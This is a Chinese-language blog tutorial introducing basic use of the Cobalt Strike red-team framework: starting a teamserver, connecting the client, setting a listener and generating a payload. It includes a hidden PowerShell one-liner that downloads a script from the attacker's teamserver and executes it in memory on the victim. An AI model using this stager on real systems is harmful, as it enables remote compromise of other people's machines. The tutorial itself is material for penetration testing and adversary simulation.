Cobalt Strike(一)基本使用

发布于:2022-12-15 ⋅ 阅读:(940) ⋅ 点赞:(0)

一.简介

主页  Cobalt Strike | Adversary Simulation and Red Team Operations

Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。

Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

Cobalt Strike整体功能了解参考

客户端(clinet gui)

团队成员使用的图形化界面

服务器(Team Server)

 生成攻击载荷(payload)

下载攻击代码(会在服务器设置的端口上提供攻击代码下载)

监听器(端口监听)

Team Server 日志记录 保存在logs文件夹

支持团队协同操作

运行坏境

服务器(Team Server) kali linux  

客户端 (clinet) java开发跨平台(安装jre即可使用 )

创建服务器(Team Server)

─# ./teamserver             
[*] Will use existing X509 certificate and keystore (for SSL)
[*] ./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]

        <host> is the (default) IP address of this Cobalt Strike team server
        <password> is the shared password to connect to this server
        [/path/to/c2.profile] is your Malleable C2 profile
        [YYYY-MM-DD] is a kill date for Beacon payloads run from this server

 ./teamserver <host> <password>

./teamserver 192.168.1.53 password1

客户端连接(clinet)

linux kali

 ./cobaltstrike

 连接上客户端

如何让目标连接上teamserver?

1.设置监听器(linster)

2.生成攻击载荷

url它是个文件路径

就是让目标 (受害者)通过这个地址和端口下载 恶意脚本

选择好监听器

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.53:80/a'))"

 这份代码就是powershell 运行 加载到内存执行。

3.目标机子运行(victim)

                                                ——————————————————她拨弄琴弦,扬起潮汐。